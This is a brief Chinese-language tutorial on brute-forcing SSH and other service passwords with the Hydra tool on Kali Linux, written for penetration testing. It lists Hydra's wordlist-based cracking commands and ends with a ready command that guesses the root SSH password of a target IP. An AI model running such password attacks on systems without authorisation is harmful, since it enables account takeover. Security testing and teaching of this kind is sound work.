SSH密码暴力破解
1、Hydra(海德拉)
hydra 是世界顶级密码暴力密码破解工具,支持几乎所有协议的在线密码破解,功能强大,其密码能否被破解关键取决于破解字典是否足够强大,在网络安全渗透过程中是一款必备的测试工具。
1.1指定用户破解
打开kali虚拟机
输入hydra -h 查看帮助
Examples:
hydra -l user -P passlist.txt ftp://192.168.0.1(大写P后面跟着字典文件,尝试用密码破解)
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN(注意此处是大写L,后跟字典文件,小写P后跟指定密码)
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5hydra -1 admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh
可输入命令hydra -h|less查看帮助
破解命令如下例如:
root@kali:~# hydra -l root -P pass.txt(已存在的字典文件) 192.168.106.134(需破解的主机ip) ssh